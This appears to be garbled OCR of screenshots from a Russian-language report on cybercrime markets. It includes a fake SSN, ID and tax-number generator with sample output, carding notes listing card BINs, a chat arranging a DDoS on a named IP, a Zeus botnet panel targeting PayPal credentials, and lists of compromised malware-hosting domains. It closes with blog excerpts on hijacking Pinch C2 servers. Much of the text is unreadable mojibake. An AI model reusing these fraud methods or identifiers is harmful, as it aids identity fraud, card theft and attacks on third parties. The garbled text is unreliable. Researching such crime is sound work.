KomnaHven Apple comepxumoro storo oTYeTa. Ewe... 


Npw quarkocTyeckom TecTMpoBaHmn «BbecnposogHan 
AWarHOCTMKa» MOXET BPEMEHHO USMEHMTb HACTPOMKM CeTH. 


Yro6bi NpUucTynMTb K QvarHocTuKke GecnposogHok cpepbi 
KOH®urypauuu, HaxKmuTe «[]pogonxKuTe». 


OF KUTb 
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US SSN / Driver License / State ID / Passport / Tax ID Generator 


US State or Territory WUT aT 
Alabama (AL) 


Ej Include Passport ~CTABUM Franky, STO BKNIOUWT AaHHbIe Nacnopra 


First name Middle name {if any) Last name 


a es 


Gender Date of birth (YY YY/MM/DD) 
OM oF fii | 


BOuBaeM AAHHbIe UV HAKUMaeM, NoNyuaemM BCE UTO HUKE 


Ho 73 000 | Ha pexnamy 


SSN 417474838 - |ssued in 3 (AL iOM XOBAHUA 
Driver License 6959609 - issued in Alabama (AL) on 07/09/2015, expires 04/11/2020 HMOMED BOD NDbaB 


US Federal Taxpayer Identification Number (TIN / Tax ID) 
Preparer Tax Identification Number (PTIN) P24358664 
Interim PTIN (temporary PTIN PS9994838 
Employer identification Number (Elt 276686761 
Individual Taxpayer Identification Number (ITIN) 823716073 
Adoption Taxpayer Identification Number (ATIN) 186452595 


3bI aH 
3aKOHUMTCA 


; 


3TO 2 CTPOUKM KOffa, KOTOPbIC CTOAT BHUSY 
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ToproBas nnouwagka no npopaxkam 
AKKAYHTOB c 6anaHcamun/nognuckamn, 
VW MHOKECTBa Apyrux TOBAapoB U ycnyr 
pasnuu4Hbix Chep MeATenbHOCTH. 


-flo BONPOCAM PEKMIAMbI VM COTPYQHUYECTBA, NVLWMTE B n/c. 
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SN 
—~ 
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Caenan Ginet wepes Ceprx00, Kises - Mexcua Curt, vepes Naprox. Bce Gero caenano oneparnano 1 Oven KayeCTBErIO, OF Gea Orman 4 


MOCTYNEN BCe BPE vu BCEerQa GeicTpo oTHe4an. PaGoTan Ges rapanta 4 BCE HOpes, NPOCTO Mysundil!! 10/10 


29 Map 2021 
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3. 2 HyKHb!I Socks 5 an60 SSH 

4, Ham HyKeH mat Amex /VISA/MC xasaert sce u nanky Tome Cc AoroB 
unu 6pyt 

5.BIN: 372741 ,548012 529149 ,474165 ,517805 408540 


408540 na 10 B6un808 NpoxoANTD. H Take xaBaer won BIN NO AVS c 
VBV xpet # NO VBV 


You've recenwed a GOG.com gut! 
- 
TEST TET 
ee a 


ee ae tee oe oe ee pre pr et 


17755 


17756 


TO ecTh A Gyay MOHUTPHT paboty cepeepa =...) 


Hy “ac 3aKOHUMACR, MOKA BCE 5). W 
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cea! 31634 
1118 94s 
19179325001 
18178872041 
101775368 * 
11 7029 
1017 

11173006055 
1 39554 


Ecnu kopotko. O6patunca 8 cepsic WP Cepxxo@ wn caenan 3axa3. Bnepspie. 


Nepener ana apyra ao Nyanaei, Adpixa OOOO 
g Bce ¥eTKO, POBHO, KAYECTBEHHO HM HEOMQaHHO NpHATHO!!! ¢ 
Tapantuit HamHoro Gonbue, 4eM DaloT Camu aBHakomnanin Hn Oenbie areHTcTBa! 


Cepx 6bin Ha CBAIN M CNpaWBaN BCE Nt XOPOWO OT MOMEHTa BXOAa B AIPONOPT, Ha PEC TPA, Ha TAMOKHE, Ha NOcagAKe B 
CamMoner, Ha NepecagKe, BO BPeMA OADQAMNA, BO BPemA MocaAKn. 


Notom Cepx 3a6bisaet KTO THI Taxol. Cepsuc TOM!!! @oTK npunarato! 


Cnacu6A re6e Cepanxo, Tet HepeanbHo Kpyr!!! ink HepeanbHo Kent!!! a (A He CHMbHO MOHAN) 


A - aE 
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Printer friendy page 


Order details 


SOM Uy en 5065) + Show addinonal actons Shipping address 
wpe 
Delivery package 1 of 1 


Estimated Geltvery Wednesday, Nov 16, 2016 - Thursday, Dec 1, 2016 


Unlocked Android 20.7 MP Smartphone 2” 

hem price $948 Return tom 
Quantity 1 

Nem number a 

Shipping service ePacket delivery fom Mong Kong 


G Sony Xperia Z2 06603 16GB GSM Factory Contact setter Order total 


Don't forget about this item 
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Ejik 
Perectpauen 
30 Map 2021 


Coc6menna 
Pe axipent 


1 
0 


3apaecteyiite. Ha OAMH “ac, CerogHA B 20.00 ip 46.4.72.221, cKOABKO 
37O GyAeT CTOUTS M KyAa ONNAYHBATE? 16:14 SW 


AeHb ACGpbIA 6.» 


Cnpawmeair Ha BM COBCeM He BapMaHT, NPOCTO Ha KMiBM eLYe 
nepesognts B $ Haso 1617 YW 


a 


a 
Hy Toraa kak pa6otaem? Mb! wac onnauneaem u 20.00 ece 


HauMHae}rcr? 16:18 Y 


~~ 


R6750932114926 


Aa BepHo 


R675093214926 


Cnpawmeaor Kobienex py6neeniit, a onnata B $ No KaKOMy Kypcy 
TOF AA CKMAbIBaTD? 16:19 W | 


CMC OT BM HE MPUXOAMTFOBOPAT 46-57 yy 


30 Map 2021 <Q 621 


Ortapixann veTsepom 8 Dy6ae, Gpanu y Cepxnxa 28a pasHeix OTeNA & PasHbIX PawoHax C KNACCHbIM BKAOM M3 OKHa. “TO 
NOHPABHNOC - TAK 3TO BHHMATeNBHOCTS, Kazanock 4TO CepxHk NPHCyTCTByeT PRQOM M NOMOrae;T, MHTepecyercA Bce NH B 
noprake. Tax xe Gpann ornusnyo aKckypcmio Ka Axte, rae tax xe Bce Seino opranHz0BaHo Ha 100% u Geictpo. Over 
AOBONbHbI, Kay YTO patbWwe He pewannce, Morn Geil xuTe B ropasgo Gonee wHkapHbix OTeNAX 3a Te xe Dever). Tenep» 
6ynem Gpate orenn  9KCKypCHH TOMeKO y CepxnKa 
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OTAMYHO j603 wy 


Hy 3HaumT 8 20.00 6Gygem «AaTb, He 3a6yAbTe UTO ip HaMeHMNCA, A 
Beiwe nucan. 16:34 V7 


3TOHOBBIA MINUTO 56.94 


He CTapbit 9.05 


30810 


Ai noHMMai, O6tACHANA 3TO Tem KTO ONNauMBaN, FOBOPAT AOrMKa 
Takaa, CAM NP MaKCMMaNbHOM KOAMUECTBE HFPOKOB CAenaTo 
aTaky Ha 4aC TO 3TOFO AOMKHO XBATHTS YTOGb! NOAM yuUAM Ha 
Apyrme cepsepa urpate MNO MTOry HECKONBKO 3aKa308 Ha Wat 
SbiigyT Aeweene UeM REHb 17:12 W 


2 @CAM OHM ONAATAT CYTKM Ht PaZOObWOT MX Ha HyKHOE MM BPEMA 
17:13 
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tue fh EEE | 
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montana-rapp .it/default.html 
yesilderekoyu .com/live.html 
eppa.com .br/default.html 
sport-niederrhein .de/checkit.html 
27mai2006 .be/live.html 
grupomarket .com/fresh.html 
japansec .com/live.html 

spera .de/live.html 

realadultdvd .com/tds/go.php?sid=2 
08c .de/checkit.html 
systematik-online .de/1.html 
garrano .pt/1.html 
directorionacionalcristiano .com.co/default.html 
autoreserve .fr/live.html 
wwguenther .de/default.html 
escuelamontemar .com/default.html 
pacer-consultants .com/default.html 
venhuis .de/default. html 
rampichino .eu/fresh.html 
ulrike-sperl .de/stream.html 
mydirectcube .com/1/5565/ 

eleusis .tv/default.html 

590candles .com/videos/live.html 
tao767 .com/videos/live.html 


news1590 .com/videos/live. html 
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root@HackWare: ~ 


Darn Mpasxa Bun Plowcxk Tepminan Cnpasxa 


root@HackWare:~# curl -I -A "Mozilla/5.6 (Windows NT 10.6; Win64; x64) AppleWebKit/537.36 (KHTML, Like Gecko) 
'64.0.3282.1406 afari/537.36' https: //wew.acrylicwifi.com/Acrylicwifi/UpdateCheckerFree. php?download 
362 
Sun, 11 Feb 918 68:21:36 GMT 
itml; charset#UTF-8 
d4b0f2b1ccda85d22c7946de1417158e61518337296; expires=Mon, 11-Feb-19 08:21:36 GMT; path=/; d 


cache-control: max-age 
strict-transport-security: ; includeSubDomai preload 
content-t f-options: no 
expect-ct: max-age=6604860, uri="https /report-uri.cloudflare.com/cdn-cgi 
loudflare 
3e¢b5e54559f56427-FRA 


root@HackWare:~# §f 
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Home News Report People Research Download Search Upload BBS 


OPEN MALWARE BENCHMARK 


Malicious URL Map(2016) 
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For Your Protection 


Instructions Get Identification Code 


Enter identification Code 


© Help with this page 


Get your Identification Code & — select one of the options below to receive your temporary Identification Code. You 


will need to enter this code on the next page. 


For text messages, there's no charge from us, but standard text messaging rates from your wireless provider apply. 


Send My Code to: 


Phone number 
wor-00- 3803 


100-006-7782 


OR E-mail address 
( e..s@yahoo.com 
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C Voice © Text 
C Voice © Text 


The contact information you see here is from your current 
account profile with us. Ifit's outdated, you can change it 
later, but for security reasons, you must select one of 
these options to receive your identification Code. 


Please allow extra time to receive your Identification Code 
by e-mail or text message. Ye'll send the code 
immediately, but many factors can influence how fast it will 
appear in your inbox or on your mobile device (e.g., internet 
traffic, ISPs, software settings, etc.). You may also want to 
check your SPAM folder if you have one. 


Ifyou ask us to send you a new Identification Code, the 
previous code will become invalid, even ifit has not 
arrived. You may want to receive the code by text message 
ifan @-mail didn't arrive 


PM |\EHbI OT 0.835 


© oonnata GuTKOH 
ie BuTKOMH 2 Re ®e 
Dy ° 


canblllE KONMYECTBO aproMATHUECKHI 
BOSRPAT CPEAICTB 


gn oa on e 

ie ee HOMEPOB H MCTOYHHKOB 

5 ge 

oo > a KOH@DM/IEHUMANDHOCTD 


we 


wae 


SMS 


CEPBMCHI 


epcenpoT | WALMART | MONEY LION 


GOOGLE | PAYPAL J 


ai VENMO 
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€72¢d B 5.8.60.105/webmaster.php?m=home 


Information: ta tormation 


Currers user: shit_acnin 
02.11.2015 Toxal reports in cacabase: 


15:21:37 @ america/wew_vork foe s en 
‘Statistics: : 

T 7. 
P oral bees: 971 
fos Toral active bots in 24 hours (click for details): 24.30% - 236 
Potentiaily dead (>14 days 0 (0%) 
Bex versions (clk for details: 0.0.3.3 = 0.0.1.1 


@ installed Software 
Botnet: 
& bas 


» Webinjects 
@ comments usexe NOTSCANNED 0 days.old 


D socks 
= 


Exe Configuration 


a a New bots (971) 
Reports: 

[0 Search ndaabase caw 

& Fevorite reports bla 

B® Seach n files Qua 

© View screenshats Ow 

ue View videos 

GB cM Parser 


Online bots (73) 


Eehca 
Eavn 
On 
Qua 


Bis 
Co 


vuigiveremi Sica? Beli sS ala wie Fie 
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creativ-design-geduhn .de/default.html 
704friends .com/videos/live.html 
in3089 .com/videos/live.html 
textclouds9 .com/videos/live.html 
firebomb5 .com/videos/live.html 
asb-ov-nauen .de 
penz-bauunternehmen .de/default.html 
adulttopvids .info 

insane-rec .de 

scdormello .it/default.html 

ttolttol.wo .to/fresh. html 

icr-sgiic .es/fresh.html 


diezcansecoeducacion .iespana.es 


unternehmensberatung-hutter .de/live.html 


koon-design .de/topnews.html 

alim.co .il/topnews.html 

2z.com .br/hotnews.html 
guerrero-tuning .com/topnews.html 
debeer-webservices .nl/fresh.html 
$215847279.onlinehome .fr/stream. html 
lauscher-staat .de/topnews.html 
crosspointbaptistchurch .org/fresh.html 
residenceflora .it/topnews.html 
b1.kurumsalkimlik .biz/checkit.html 


africaviva.org .br/stream. html 
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(> 5.8.60.105/webmaster.php?m=botnet_tokenspy/index 


& Bots 
» Wed-injects 
0 Commands 
2 socks 
8 vnc 
& TokenSpy_DeveiMode 
Reports: 
© Search in catabase 
i Favorite reports 
& Search in fies 
= View screenshots 
& View videos 
@ CMO Parser 
Neuromode! 
\ Links 
$ Balance Grabber 


U Cryptexe 
@ FTP ttramer 
ak Fite Hunter 
© Matter 
System: 

@ information 
\@ Optons 

2. User 

2 Users 


Logout 


Launch TokenSpy 


Rules 
Proxy Masks 


nt?" paypal.com” 
hip?" sizvil.com" 


Submit Rules 


Rules script needs to be updated 


The above rules will only be applied to bots once you subeut them. A script is created for that 


Botnets All None 
Script stat 
Sent = 732, OK = 715, Errors =0 
Dates 
2015-10-28 21.5952 = 2015-11-02 00-2701 


@ usca 


Atmos Lab © Stay Connected 
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™ a 
Telegram Inviter by Satanic_nya 


Jloruubt: Hactpoiika Jlor: 


@Phaust88 BoiGepuTe npodunb ana pa6orTi: 


@olegbaikal_8888 Account N96 
@zuebyf - 
@antofat JIOrMk Fpynnb! Kyga VHBAaNTMTb: 
@ed_gibbs @myfirstgroup 
@istinspring _ 
af 3anepxkas 1000 > mjc 

ge_l aan 
@wakertotheway MeHAT® akkayHT Nocne 3 |=) owM6oK 
@truwim 
@doublesix621 
ee MeHATb npodunb uepes 10> nayeK 
@gordey_t YAanaTb VCNONb3IOBAaHHbIE NOFMHbI 
@beskonecna Boigenuny ans unBaitra. 
@huisosidnar OTKPbiTb CTaTUCTUKy | Viuyem Mini_Plombir v 


3arpy3MTb NOMHbI SanyCtutb OUNKCTMTb Nor 


OcTaHoBMTb Boirpy3utb nor 


Vuyem Angel_dny a 
Mpuctynaem K MHBaiiTy. 


= a ae ae 


Kagem 3arpy3kuv rpynnol. 
3auHBatunn 5/10. 
Boigenunny ans unBaitra. 
Vuyem Damian604 
Boigenunn ana vHBaliTa. 
Vem SergeySelihov 
Boigenunn ana unBaiiTa. 
Vuyem yozikus 
Boigenunn ana MHBaitTa. 
Viuyem teddiesartist 


WHealiT NaykaMH: MHBAaTHTb S > 3a pas 


Telegram Inviter by Satanic_nya 


Jloruubt: Hactpoiika lor: 


@Phaust88 BoiG6epuTe npodunb ANA pa6orTei: 
@olegbakkal_8888 Account N96 v 
@zuebyf 

@antofat SloruH rpynnel Kyfa MHBATHTb: 

@ed_gibbs @myfirstgroup 

@istinspring ; 

@slvM 3anepaxkas 1000 > mic 

@ge_la fault 
@wakertotheway MeHaTb akkayHT nocne 3 |=) ownGoK 
@truwim 
@doublesix621 


@mogfdfghjk 102) 
peat a MeHAT’ npodunb yepes 10> nayeK 


Vuyem Angel_dny 
Mpuctynaem K MHBaiiTy. 


weer — se: 34 —o 


Kagem 3arpy3ku rpynnel. 
SannBantunn 5/10. 
Boigenunn ana vHBaltTa. 
Vem Damian604 
Bbigenunn ana uHBaitTa. 
Vuyem SergeySelihov 
Boigenunn ans unBaiira. 
Vuyem yozikus 
Boigenunn ana uHBailira. 


Wnealit nauKaMu: MHBaTHTb S > 3a pas 


@gordey_t YAaNATb UCNONb3OBaHHbIe NOPMHbI Viuyem teddiesartist 
@beskonecna Boigenunn ana uHBaitTa. 
@huisosidnar OTKPbiTb CTaTuctTuKy | Viuyem Mini_Plombir 


3arpy3MTb NOMHbI Zany CTUTb OuuCcTMTb Nor 
CoxpaHuTb OcTaHoBMTb Beirpy3utb nor 
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Geographical distribution in 2016 


© MARCH O MAY OJUNE OJULY 


OAUGUST OSEPTEMBER 
The last conferred attack how tte Fan The te atck one Attacks on barks Attacks on Darks Conterned thet 
on a Dark conducted eundeng money ae Risse bert Lor + eGeope & ierw form ATMs outsde 
by he Behtrap group to Buttrap Cobalt Strice BS kos Stews xen ed 
- Pere 68 Foren SS Petetetrnh 
 Comary Soe Bre 
- Foard @ Vaan 


OOTHER 

= iiowre 04 Loe 
leew = Uae 
Bieter Blegtirs 
> George 2 leer 


| + Search a | 
ds | Other Gaming Gift Cards 


0000 


f @ v 
al $50 PlayStation Store Gift Card, Sony, [Digital Download], 
eCard 799366792789 


@AOOs Bireviens Sony Welw # 5622629 


2 PlayStation Store 


OA ‘ 
XO > 


2k Sold & shipped by Walnut 


Tsou TpeHep 


Helitan Xayc 
Beayuyii aKcnepT no Ku6ep6e30nacHocTu 


Y MeHA 24-2eTHMH ONbIT paGboTbI B O6NacTv KuG6epbe3z0NacHOCTy, 3a 
BpemA KOTOPOFO A KOHCYAbTMpOBaN KpynHeiwiue KOoMNaHML NO 
Bcemy mupy, O6ecneumBan 6e30NaCHOCT’ MHOFOMVVAVOHHBIX 4 
MHOFOMMINMapAHbIX NPOeKTOB. A pyKOBOXy KOHCANTUHFOBLIM 
areHTCTBOM NO BONpocam G6e3z0nacHocTy Station X. Copcem HesaBHO 
A BLICTYNaN B Ka4ecTBe BEAYLerO KOHCYMbTAaHTa NO Ge3z0nacHOCTH B 
page komnaHuiA Benuko6putanun, pa6ortaounx B chepe 
MO6MABHOFO GaHKUHFa VM NNATeXHbIX CuCTeM, NOMOFaA O6e30NAaCUTe 
& 20,796 Crygextos TpaH3akunu Ha 71 MApA yHTos cTrepuHros. 


® 4.6 Cpeguan ouenKa 
@ 3,565 Orsbisos 


© 4kypca B uucne moux KaveHTos 6b: BP, ExxonMobil, Shell, Vodafone, VISA, 
T-mobile, GSK, COOP Banking Group, Royal Bank of Scotland, 
Natwest, Yorkshire bank, BG Group, BT, London 2012. 


Muoro pa3 © 6610 yuaCTHMKOM VM CNMKepoM Ha pa3fuuHbix 
KOHdepeHumAx NO 6e3z0nacHocTy, paspa6oTumKkom GecnnaTHBIx 
VHCTPYMeHTOB NO GeZ0NAaCHOCTH VM OTKPbIBaN Cepbe3Hble 
YASBUMOCTH B Ge30NaCHOCTM NONyAAPHbIX NpuNOxKeHNH. 


Ksanugukauunu uv aunnompi 


* BSc. (Hons) Computing ‘Networks & Communication’ 1st Class 
Honors 

* SCF : SABSA Charted Architect Foundation 

* CISSP : Certified Information Systems Security Professional 

* CISA: Certified Information Systems Auditor 

* CISM : Certified Information Security Manager 

* ISO 27001 Certified ISMS Lead Auditor 

* CEH : Certified Ethical Hacker 

* OSCP : Offensive Security Certified Professional 
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Nowy Cnazarb Orposvoe cnacw60 Serggik00 3a NomMoa C OTenem B Typumi. Tax NOAYUHAOCE STO NABHHPOBAN OTAOKHYTb B ABYK OTEARK H OGPATHAKR K 
ApyTOmy YMeAbUY, #0 K COMAACHHO Or NORDEA M yTPOM MEpea PeACom HEpHyA ACreDtu w CKaSAN HOOHEM HHYETO He OHAUNO. B “tore NOReTEA 6 TypuHO GES 
6porv oTena. Mo npxatty 8 Type Gran yAvenen uTO Tam booking sabe0cposan, 8 xTOre NDHUIAOCS OTALATS 32 (BOM. Baaro SerggikO0 seisnanca 
NoMouD CO BTOpEM OTerem. Geictpo seeipaan OTens, OnnaTHA Aan Zannee vw SerggikO0 cnonodino caenan OTens w Seigan Sayvep. flo scenenvs ewe 
MPOSBOHMA CTEAD # NOATEEDAKA TO BCE OK JaceAeHMe 4 BbIERA KEK 33 CBOM HinKaKHX BONPOCOS. Ewe pas Cnacv6o Serggik0O, uTo Bsipywnn OnHosHauHO 
peromernuyr!!! 


A < 


Nowy Cnazarb OrposHoe cnacH6o Serggik00 3a nomoai C OTenem B Typumi, Tax NOAYUHAOCE STO NAaHPOBAN OTAOKHYTb 8 ABYX OTEARK H OGpATHAKR K 
ApyTOMy YUeAbUY, #0 K COMAACHHIO Or NORDEA MH yTPOM MEpea PeACOMm HepHys ACHeDTu # CKaSAN HOOHEM HHYETO He OeAUNO. B “tore NOAETCA 6 TypuHNO GES 
pony oTena. Mo npxatty 8 Type Gran yAvenen uTO Tam booking sabe0cmposan, 8 xTOre NDHUUAOCS OTADAATS 32 (BOM. Baaro SerggikO0 seisnanca 
NOMOUS CO BTOpae OTeRew. Gectpo seeipaan oTere, OnnaTHA £84 Zanneie vw SerggikO0 cnoKodino caenan Oren wt Seugan Bayvep. fo scenenvs ewe 
NPOSBOHMA CTEM ¥ NOATEEPAHA WTO BCE OK Jacenenme H BDIESA KaK 38 CBOM Hinkaxnx BONPOCOS. Ewe pas CnacHGo SerggikOO, uro Beipywna OaHosHauHo 
peromenuyw!!! 


eee00 T-Mobile LTE 11:39 AM @ 13% > 
a Bank of America Corporation oS, 


= 
BankofAmerica “2” Online Banking 


Accounts Ba Pay Transfers Special Offers & Deals Toots & Investing Open an Accourt 


BofA Core Checking Sr 

Semmary Features 

Available balance (as of today); $1,379.76 = Keep the Change® savings transfers ' 
What does this include? Papertess statements: J 


‘1€Q°50303094"""" 


All Transactions View Spending & Budgeting 
P More options > 


Newest | Next | Previcus | Oktest Show deals: On | Oownkes = | Pr 


Posting Oate + Description Tyee Status 


Amount incheded in Available Balance 


Processing PENDING CREDIT ON 08/07 ® r_) 2,500.00 
ve 

Statement as of 07/08/2017 = (view statements) = 

2) 07/07/2017 Monthly Maintenance Fee & <) 712.00 

*) OG/82/2017 FEE REBILA MONTHLY FEE REBILA 1703061009684 & <j 42.00 
FOES NMO 0006576 973414 

(2) 06/82/2017 CHECKCARD 0609 DING EZETOP TOPUP oo <j +30.00 
EZETOR.COM FL 24692167160000379528603 

®) 06/09/2017 CHECKCARD 0608 DIGICEL DING TOPUP 876-380 em | 10.00 
7626 FL 24692167199000749035978 

#) 06/09/2017 Temporary Credit Reversal on 03/06/17 Card © <} “52.75 
47447601599115395 Gare 170300100084 

3) 06/09/2017 Temporary Creat Reversal on 03/07/17 Card (S) <) 160.90 
47447601 599115995 Gare 170306100984 

&) 06/09/2017 Temporary Credit Reversal on 03/06/17 Card (S) G -$00.89 


4744760159115395 Gaim 170306100984 


< 
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Games 


Half-Life Opposing Force 


17792 


Sample detection rate : flashupdate.exe 


Scanners Result: 35/36 (97.23 %) 


Trojan-Downloader.Win32.Exchanger.hk; Troj/Cbeplay-A 
File size: 78848 bytes 
MD5...: c81b29a3662b6083e3590939b6793bb8 


SHAI1..: d513275c276840cb528celldd228eae46a74b4b4 


The downloader then "phones back home" at 72.9.98.234 port 443 which is responding 
to the rogue security software AntiSpy Spider (antispyspider.net) : 
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Kax noctpowTs kapeepy 8 knGepGesonacHoctn 


3 flonyuante cepTHmnkaTb! M KBaNMMKauHn 


Ecnw 970 8O3MOXHO My BAC ECTS BPeMA, NONyYMTE CTeENeH NO penesantHomy GesonacHocTn 
Npeamery (koMnbOTepHas HayKa/IT). Bawa aunnomnas paGoTa AOnxHa bith CamzaHa 

C Ges0nacHocTeo # PACKPLIBAaTS BOCTPeGOBAHHyIO B MHAYCTpHM Temy. STO NpMBeNeT BAC 
HaNpAMyio K NONYyYeHVO PAaGOTE!, NOCKONSKy Be! CTAHETe NPH3HAHHEIM CNeUMaNViCTOM 

8 CermeHTe GesonacHoCcTH Ha Pee Tpyla. 


C yyetom orpomvoro cnpoca Ka Cneumannctos No GesonacHoc™, COBepweHHO 
HOOGAIATENDMO NONYYATS CTENGHD, TOM HE MOHOe, 3TO NDOMBENeT BAC K paGoTe, ROCTYNHOA 
DNA BoINYCKHMKOS BYS-O8, 1 NOMOXET BAM NPORBMHYTECA HA PYKOBOAAUIME RON-HOCTH 

8 AANbHeAWweM. 


Cobepa GesonacHoctw He cunTaercr pabotoa HayanHoro yposHa. Thoan O6bmHo npxxoasT 
B HOG M3 CHCTEMHOTO 2QMMHHCTpHpOsAaHMA, NDOrpPaMMMPpOBAHMA HM CEeTeBbX TeExHONOrMa”. 


OpMaxo, CNM Bi FOTOSD! NPOREMOMCTPNPOBATD CBOM SHaratA H HanbIKM, TO MOXKHO Cpasy Xe 
NorpyxatTeca 6 Gesonacnocts. 


Cepiucpuxauwm yny“wiaior Bal BOIMOXHOCTH NO THYAOYCTPOACTBY 4 PasIenBaiOT yMexne 
NPMMEHATS HA NPAKTHKE BAUM SHBHMS M HABLEKH. 

Korna eet Gynere W3y4aTb NOKANSHEI PeIHOK Tpyaa Ha Npenmer KavGonee MHTepECcyOUWMK 
Bac CNeuManHocTem, TO OGparwTe ocoGoe BHMMaHMe Ha CepTHq>yKauMM, KOTOpHE O6ti4HO 
TpeGyioTca ANA aTHx CNeuManbHOcTeA. Kaxne CeptucpuKath Bam Cneayet Nonyunth, GyneT 


NipwoSperaitre shawn, HEOOKOAMMeNe JIA CRAY STMX SK3AMEHOB, H KAK TONDKO 
DOCTATONHO ONDITa — NonyuastTe CepTDwxares. 


Bas0anie yposHn Copnxbuxaunn, 48 KOTOPDIe BAM CTOMT O6paTHT> BHMMaNHO: 


omar VN VN 
Ncttd Nctid Neti 
& ime vm 
| Cortiied Practtioner 


HeoGasaTenbHo anageTs STHMM CepTXhYKaTaMy — BAM HYKHO BNG.QeTS SHAHMAMM. 


crap 
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17800 


All day bitch 
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A scintti 


IS YOUR COMPUTER About AntiSpy Spider , 


TT TAKES ONLY MINUTES TO CHECK! 


FREE! aA 


New Threat 


ick here for free Scan 


"AntiSpy Spider is a cutting-edge anti-spyware solution.This revolutionary anti-spyware pro- 
gram was created by the industry’s top spyware experts in order to protect your computer 
and your privacy.html, while ensuring optimal system performance.With the ability to locate, 
eliminate and prevent the widest range of spyware threats, AntispyStorm is able to offer its 
users a Safe, soyware-free computing experience; and with it’s convenient automatic update 
feature, AntispyStorm ensures continuous up-to-date protection." 


Sample detection rate : antispyspider.msi 
Scanners Result: 11/35 (31.43 %) 

Fraud Tool.Win32.AntiSpySpider.b; 

File size: 1851904 bytes 

MD5...: 2f1389e445f65e8a9c1a648b42a23827 


SHAI1..: e32aa6aa791eI8feb6fdef451bd3b8a45bad0acd8 
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PEELS Bele COMMEONE ECTOCER Date 


CEOS EDOW HOD EM Dede CATE He Ged 


vu epee, 
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S| PayPat inc. (US) het paypalcom f te ScdKsSHQKI YMA NFOMTY gbvPZXegt WiBM Cc \|as- 


PayPal 


Envot Pargent Facturation Solutions e-commerce Solutions eBay 


Paiementeniigne Payer sur eBay 
L'argent a été envoyé 


(a) Vous avez envoyé un paiement de €567,00 EUR 3 Adderrammane Brahim 


Nous avons ervoyé un avis de récepton 3 vor 
3 facresse Gtruish@omnat 


adresse email. Nous avons également envoyé une nodfication 3 Abderrahmane Grahem, 
om cher les oéiails « vans action 


Cette adresse email ne figure pas dans votre ste Ge contacts. Si vous lajoutez. vows pourrez erwoyer Ge Targent plus rapedement ia 
prochaine foes 
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root@HackWare: ~ 


@atn Mpaska Bug Mlowk Tepmvnan Cnpasxa 

# php parsexXMP.php “curl -s https://hackware.ru/?feed=rss2 
Hosoe 8 airgeddon 8.0: ataku Ha “acToTax SGhz wu rnyweHHe TO“eK MOCTyNa, ABTOMATMMYECKH MeEHRWUMX KaHanbi 
Kak onpegenutb, Kakow Wi-Fi agantep nogowpét ana Kali Linux 


Bouwna Hopan Bepcua Kali Linux 2018.1 


PeweHne npoOnemp 8 Kali Linux «W: Mpon3sowna ownOKa npuw nposepKe nognucu. PenosuTopu He OOHOBNEH Hw OyAyT 
HCNONb3SOBaHW Npegigyume MHMeEKCHHIe han. OwnOKa GPG» 
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The bottom line - over a thousand domains are participating, with many other appar- 
ently joining the party proportionally with the web site owner’s actions to get rid of the 
malware campaign hosted on their servers. 
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In the very same way a cybercrime analyst is reverse engineering and sandboxing a particular 
piece of malware in order to get a better understanding of who’s being it, and how successful 
the campaign is once access to the command and control interface is obtained, cybercrimi- 
nals themselves are actively reverse engineering the most popular crimeware kits, looking, 
and actually finding remotely exploitable vulnerabilities allowing them to competely hijack 
someone’s command and control, and consequently, their botnet. [1]The Zeus crimeware kit, 
which I’ve been discussing and analyzing for a while, is the perfect example of how once a 
popular underground kit start acting as the default crimeware kit, cybercriminals themselves 
start looking for vulnerabilities that they could take advantage of. And those who look, usually 
end up finding. 
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A remotely exploitable flaw allowing cybercriminals to remotely inject a web shell within 
another cybercriminal’s web command and control interface of the popular Pinch crimeware 
that’s been around VIP underground forums since June, 2007, is starting to receive the 
necessary attention from script kiddies catching up with the possibility of hijacking someone’s 
malware campaign due to misconfigured command and control servers. 


IP detected... Send exploit... ok Headers: date: Sat, 30 Jun 
2007 10:30:55 GMT server: Apache/1.3.37 (Unix) 
mod_ssl/2.8.28 OpenSSL/0.9.8a PHP/4.4.4 mod_perl/1.29 
FrontPage/5.0.2.2510 x-powered-by: PHP/4.4.4 comnection: 
close transfer-encoding: chunked content-type: text/html 
Server GMT: -14400 Build shell names... Parse dir names... 
Scanning... Scan ‘http://pmch-host.nw"... Scan ‘http://pinch- 
host.ru/gate/reps/"... Scan ‘http://pinch-host.nv/ gate"... 


With the exploit now in the wild, retro cybercriminals still taking advantege of the ubiqutous 
command and control interface that could be easily used by other malware rathar than Pinch, 
"cybercriminals are advised" to randomize the default file name of the gate, and apply the 
appropriate directory permissions. 
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Monocultural insecurities are ironically started to emerge in the IT underground with the 
increasing commoditization of what used to be a proprietary web exploitation malware kit or 
a banker malware kit, allowing easy entry into the malware industry through the unregulated 
use of what some would refer to as an "advanced technology" that only a few cybercriminals 
used to have access to an year ago. Just like legitimate software vendors, [2]authors of 
crimeware kits are also trying to enforce their software licenses and forbidding any reverse 
engineering of their kits in order to enjoy the false feeling of security provided by the security 
through obscurity. The result? [3]Cybercrime groups filing for bankruptcy unable to achieve 
a positive return on investment due to their intellectual property getting pirated and their 
inability to enforce the licenses that they issue to their customers. 


We're definitely going to see more trivial, but then again, remotely exploitable vulnera- 
bilities within popular crimeware kits, which can assist both the cybercrime analysts and 
naturally the cybercriminals themselves. For the time being, even the most sophisticated 
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malware campaigns aren't fully taking advantage of the evasive and stealth tactics that the 
kits, or their common sense allows them to - let’s see for how long. 
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ep: / forums, synantoc, con/eynent /blog/axticle?acsbage uid-319059 
_nttp://ologs.zanet.con/security/2p=1596 

| http://adanchey.blogepot .con/200T/42/russias-feb-v cybercrime. htall 

_hutp:/ /adanchev. blogspot con/7008/04/crinevare-in-middle-zeus. neal 

| http://ddanchey. blogepot con/2008/06/zous~ cr imovare-kit-valnerable-to, hal 
_netp://adanchev. blogspot .con/2008/07/coding- spyvare-and-nalvare-for-hire. ntl 
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4.8.7 Phishers Backdooring Phishing Pages to Scam One Another (2008-08-07 17:23) 
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this mastercard 43.54 


4 2020/11 33-54 “) 


Where areu from btw j2-<4 
nl 


you think its still valid? ;2.54 yw 


It should be, for the end of the month ;2.<y 
but if it doesnt work let me know ;2.<4 


oksure 43-54 Ww 


SELLER PANEL EARI@NGS 
Top 10 Seters Seller's Terms ! 
. Sener Earned | Wf you Broke one of ese rules your accoutt will be 
tetpences | 
4 Powron 8075 KS 2 (OatNg Accownts) you ShOUN wpoad WHA brackets for 
=~ ena? 308 on: Match(P and) Match(Uspaic) | 
3 (ROPS) inctude # cescrnipmon ROP Carces or ROP 
3 Thanker Setters 6269 05 races! 
